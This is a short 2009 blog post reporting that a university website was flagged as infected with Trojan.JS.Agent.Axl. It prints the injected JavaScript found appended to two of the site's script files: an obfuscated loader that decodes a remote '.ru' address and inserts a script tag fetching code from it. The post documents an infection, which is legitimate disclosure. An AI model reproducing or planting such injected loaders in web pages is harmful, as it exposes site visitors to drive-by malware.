| Mercubuana website infected by Trojan.JS.Agent.Axl |
| News - it-stuff |
| Written by mangthjik riche |
| Wednesday, 23 December 2009 03:23 |
|
http://kk.mercubuana.ac.id/new/index.php , when I was open it with firefox, my KIS inform me that site is contain Trojan.JS.Agent.Axl, here the information.
Droped trojan in Cached
********************* 'text/javascrip***t');Jks0ui2n781rkgl.setAttribute('src', 'h&(t@&(!t)@p)@:##/$)/$&@#m@@$a!(i&@l^@&#-$c^#$o@@!&m#@.!&^##h$$@@o$&t!)f$$(i^)l)#$#e#)!.$!c^)&o&m (^.#^&r$!e^$$&u)&t#&e@@!)r#)!!&s$#-&&c(o#m!.^)(s^!i&!^m^p(^l@@!e((w()o$@r^(!l)(^d$(h#^o#u^$$s)!e&#&$).@r&)u!#:@(8)&0!(8(0#(/$&$l!)a#&)#t(i&#$)m$e@$@s##).$!c^o(@m) ()/)@)l###(a$!t)^$(i$m(^$e$s$.^$&c@@^o^!#m^&/)$h&^o(&(t&^t$i##@e&))s)***@t(^^a!r&&&.&c!!o#m#@$/^p!^)^r$)^i&!c(&!e!)!m^i##!$n#&i$()s!t@$e$(@@r)) ^!.#@$))c^!o)m)#)#/(&!@g@@$o)@^&@o#g(@##l&(e)!!(.#)((c!o@(^m)&$/(!^@'.replace(/\ (|\!|\$|@|\^|\)|&|#/ig, ''));Jks0ui2n781rkgl.setAttribute('defer', 'defer');/document.body.appendChild***(Jks0ui2n781rkgl);}} catch(e) {} Capture melar.js which altered by virus added at last line
Capture mmenu.js which altered by virus added at last line
I don't know after this article is written, the malicious code had removed or not from thesite. :)
|
| Last Updated on Wednesday, 23 December 2009 10:10 |
Newsflash
Finished Optimized Site
Read More Interesting Article from Main Menu Category |
Site Search
Search Engine to Find Software and Mp3
|
|
© cintaabadi.
Comments